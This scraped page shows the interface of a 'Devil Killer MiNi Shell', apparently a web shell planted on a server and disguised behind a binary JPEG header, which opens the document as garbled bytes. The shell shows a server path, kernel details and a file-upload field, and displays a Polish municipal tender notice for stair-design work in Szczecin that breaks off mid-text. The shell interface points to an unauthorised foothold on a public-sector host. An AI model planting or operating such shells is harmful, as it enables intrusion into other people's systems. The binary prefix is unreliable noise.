JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250902/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250902/0040167401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo - kosztorysowej dla zadania pn.: „Budowa schodów dla nitki wjazdowej i wyjazdowej Trasy Zamkowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO SZCZECIN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Biuro ds. Zamówień Publicznych Urzędu Miasta Szczecin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Armii Krajowej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-456</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@sim.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um.szczecin.pl/chapter_11760.asp</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Szczecińskie Inwestycje Miejskie Sp. z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">8513235304</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Mieszka I 33</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">71-011</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@sim.szczecin.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.sim.szczecin.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo - kosztorysowej dla zadania pn.: „Budowa schodów dla nitki wjazdowej i wyjazdowej Trasy Zamkowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3f7ee50e-cf3d-4fdd-ba40-7da931eb7f82</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00401674</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sim.szczecin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między zamawiającym a wykonawcami, w szczególności składanie<br/>ofert oraz wszelkich oświadczeń i wniosków (w tym o wyjaśnienie treści swz), a także przekazywanie zawiadomień i informacji<br/>odbywa się wyłącznie w formie elektronicznej za pośrednictwem Platformy Zakupowej (zwanej dalej: „Platformą”) pod adresem:<br/>https://platformazakupowa.pl/pn/sim.szczecin<br/>2. Zamawiający nie będzie udzielał odpowiedzi na pytania do SWZ lub rozpatrywał wniosków dot. czynności podejmowanych w<br/>postępowaniu w przypadku, gdy Wykonawca złoży wniosek w inny sposób niż za pośrednictwem Platformy (np. na adres e-mail).<br/>3. Składanie ofert następuje za pośrednictwem strony internetowej prowadzonego postępowania - platformy zakupowej dostępnej<br/>pod adresem internetowym: https://platformazakupowa.pl/pn/sim.szczecin.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a<br/>wykonawcami, w szczególności składanie ofert oraz wszelkich oświadczeń i wniosków (w tym o wyjaśnienie treści swz), a także<br/>przekazywanie zawiadomień i informacji odbywa się wyłącznie w formie elektronicznej za pośrednictwem Platformy Zakupowej<br/>(zwanej dalej: „Platformą”) pod adresem: https://platformazakupowa.pl/pn/sim.szczecin<br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej.<br/>3. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych”.<br/>4. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>1) .zip<br/>2) .7Z<br/>5. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB oraz na<br/>ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>7. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>8. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>9. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie<br/>różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>10. Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>11. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość<br/>do zamawiającego”, nie za pośrednictwem adresu email.<br/>12. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>13. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>14. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>15.Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>16. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>17. Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XXV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SIM/ZP/P/15/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem umowy jest zadanie pn.: „Budowa schodów dla nitki wjazdowej i wyjazdowej Trasy Zamkowej”, polegające na wykonaniu kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej dla budowy schodów dla obydwu nitek Trasy Zamkowej w rejonie przystanku tramwajowo – autobusowego na ul. Energetyków pod obiektem Trasy Zamkowej wraz z niezbędna infrastrukturą techniczną i zagospodarowaniem, oraz dla budowy oświetlenia iluminacyjnego mostu nad Odrą (MO-L) dla nitki wjazdowej do miasta wraz z uzyskaniem wszelkich uzgodnień, opinii, decyzji pozwoleń, zatwierdzeń wymaganych obowiązującymi przepisami prawa oraz aktualnym stanem faktycznym, w tym wraz z uzyskaniem w imieniu Zamawiającego ostatecznej decyzji pozwolenia na budowę dla w/w zadania, oraz pełnienie nadzoru autorskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 2)	Wykonania zamówienia opcjonalnego (dalej jako: Zamówienie Opcjonalne) polegającego na pełnieniu nadzoru autorskiego w trakcie realizacji robót budowlanych na podstawie wskazanej w ppkt 1 dokumentacji projektowej.<br/>3.	Zamawiający uprawniony będzie do złożenia oświadczenia o skorzystaniu z opcji, w odniesieniu do Opcji nie później niż w terminie 24 miesięcy od dnia podpisania protokołu odbioru końcowego Zamówienia Podstawowego, przy czym podstawą do skorzystania z opcji będzie zawarcie przez Zamawiającego z wykonawcą umowy na realizację robót budowlanych w oparciu o dokumentację projektową objętą zamówieniem podstawowym.<br/>4.	Zamówienia opcjonalne będą realizowane w terminie określonym w Umowie i SWZ, przy czym jest to termin szacunkowy i będzie uzależniony od okresu trwania Zamówienia Podstawowego lub prowadzonego postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych objętych dokumentacją projektową dla danego zakresu lub realizacji robót budowlanych, nad którymi sprawowany będzie nadzór autorski. W związku z powyższym terminy uruchomienia i realizacji opcji mogą ulec wydłużeniu lub skróceniu. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający<br/>przewiduje możliwość udzielenia zamówień o których mowa w art. 214 ust. 1 pkt. 7 Ustawy.<br/>2. Zamówienia, o których mowa w pkt 1. będą polegały na powtórzeniu prac projektowych objętych zamówieniem podstawowym we<br/>wszystkich branżach: architektonicznej, konstrukcyjnej, drogowej, sanitarnej, elektroenergetycznej, telekomunikacyjnej, gospodarki<br/>zasobami zieleni oraz badania geologiczne na terenie objętym zamówieniem podstawowym oraz na terenach przyległych do<br/>terenów objętych zamówieniem podstawowym.<br/>3. Warunki na jakich zostaną udzielone Zamówienia o których mowa w pkt. 1, dotyczące wykonania usług w trakcie trwania umowy,<br/>a także po jej zakończeniu:<br/>a) z przyczyn uzasadnionych społecznie;<br/>b) w przypadkach uzasadnionych warunkami miejscowymi;<br/>c) w związku z wystąpieniem potrzeby zwiększenia zakresu rzeczowego usług;<br/>d) z powodu zmiany stanu prawnego lub wytycznych właściwych instytucji polskich lub UE;<br/>e) w przypadku powierzenia Zamawiającym nowych zadań gospodarczych lub publicznych;<br/>f) z uwzględnieniem zmian po negocjacjach z Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena oferty musi zawierać wszystkie koszty niezbędne do zrealizowania zamówienia wynikające<br/>wprost z opisu przedmiotu zamówienia, niniejszej SWZ, wzoru umowy jak również koszty w nich nie ujęte, a bez których nie można<br/>wykonać zamówienia.<br/>3. Wykonawca powinien w ofercie wycenić osobno wynagrodzenie za wykonanie dokumentacji projektowo-kosztorysowej<br/>(Zamówienie Podstawowe) wraz z wyodrębnieniem ceny za sprawowanie nadzoru autorskiego (Zamówienie Opcjonalne).<br/>4. Cena oferty brutto (C) za realizację przedmiotu zamówienia powinna być sumą następujących elementów składowych:<br/>C = C1 + C2<br/>C1 – wynagrodzenie ryczałtowe brutto za przedmiot umowy objęty Zamówieniem Podstawowym wraz z uzyskaniem decyzji<br/>zezwalającej na realizację robót budowlanych.<br/>C2 - –maksymalne wynagrodzenie za przewidywane 20 pobytów na budowie o którym mowa w § 9 ust.1 pkt 2 projektu umowy (<br/>wyliczone jako iloczyn zaoferowanej ceny jednostkowej za jeden pobyt na budowie oraz przewidywanej ilości pobytów)<br/>5. Wynagrodzenie ryczałtowe brutto za prace projektowe – zakres zamówienia podstawowego (C1) należy wyliczyć na podstawie<br/>opisu przedmiotu zamówienia oraz Projektu umowy i podać w Formularzu oferty (wzór -Załącznik nr 1 do SWZ) w złotych polskich, w<br/>wartości netto i brutto, z wyodrębnieniem stawki podatku VAT. Niedoszacowanie lub pominięcie oraz brak rozpoznania przedmiotu<br/>zamówienia nie może być podstawą do żądania zwiększenia wynagrodzenia ryczałtowego określonego w umowie.<br/>6. Maksymalne wynagrodzenie za nadzór autorski – zakres zamówienia opcjonalnego (C2) należy wyliczyć na podstawie Opisu<br/>przedmiotu zamówienia oraz Projektu umowy i podać w Formularzu oferty (wzór -Załącznik nr 1 do SWZ) w złotych polskich, w<br/>wartości netto i brutto, z wyodrębnieniem stawki podatku VAT. Niedoszacowanie lub pominięcie oraz brak rozpoznania przedmiotu<br/>zamówienia nie może być podstawą do żądania zwiększenia wynagrodzenia ryczałtowego określonego w umowie.<br/>7. Cena podana na Formularzu Ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności<br/>Wykonawcy wobec zamawiającego związane z realizacją przedmiotu zamówienia.<br/>8. UWAGA!<br/>Maksymalny koszt wynagrodzenia (C2) za sprawowaniem nadzoru autorskiego nie może przekroczyć 15% zaproponowanej ceny C1</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta Branży Inżynieryjnej Mostowej lub konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniający warunki udziału w postępowaniu określone w niniejszej SWZ.<br/>2. O udzielenie przedmiotowego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: zdolności<br/>technicznej lub zawodowej.<br/>3. Zamawiający uzna, że wykonawca posiada wymagane warunki dotyczące zdolności technicznej i/lub zawodowej<br/>zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że posiada doświadczenie w realizacji usług<br/>podobnych do przedmiotu zamówienia, tj. wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – co najmniej jedną usługę polegającą na wykonaniu dokumentacji<br/>projektowej obejmującej projekt budowlany w rozumieniu art. 34 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane, projekt<br/>wykonawczy i przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót budowlanych w rozumieniu § 4 - §<br/>14 „Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy<br/>dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalnoużytkowego”<br/>(Dz. U. z 2021 poz. 2454 ze zm.) dotyczący budowy lub przebudowy obiektu budowlanego posadowionego na<br/>fundamencie pośrednim zakończoną uzyskaniem decyzji o pozwoleniu na budowę lub decyzją o Zezwoleniu na Realizacją<br/>Inwestycji Drogowej.<br/>Uwaga: Za wykonanie dokumentacji projektowej nie uznaje się jej aktualizacji.<br/>4. Niezależnie od postanowień pkt. 3 powyżej, zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne<br/>i/lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że dysponuje lub będzie<br/>dysponował osobami zdolnymi do wykonania zamówienia w zakresie objętym zamówieniem, tj.: dysponuje lub będzie<br/>dysponować minimum po 1 (jednej) osobie (wyznaczonej imiennie do realizacji zamówienia) wyznaczonej do pełnienia<br/>każdej z następujących funkcji i spełniającą określone niżej wymagania:<br/>1) Projektant branży inżynieryjnej mostowej lub konstrukcyjno-budowlanej – „Koordynator Projektu i zespołu Nadzoru<br/>Autorskiego” posiadający:<br/>a) Uprawnienia do projektowania w specjalności inżynieryjnej mostowej bez ograniczeń lub uprawnienia do projektowania w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń uprawniające do projektowania zgodnie z przepisami ustawy z dnia<br/>7 lipca 1994 r. Prawo budowlane lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom<br/>państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej;<br/>b) przed upływem terminu składania ofert brała udział w realizacji co najmniej jednej usługi polegającej na wykonaniu<br/>dokumentacji projektowej obejmującej projekt budowlany w rozumieniu art. 34 ustawy z dnia 7 lipca 1994 r. – Prawo<br/>budowlane i projekt wykonawczy w rozumieniu § 4 - § 5 Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia<br/>2021 r. w prawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru<br/>robót 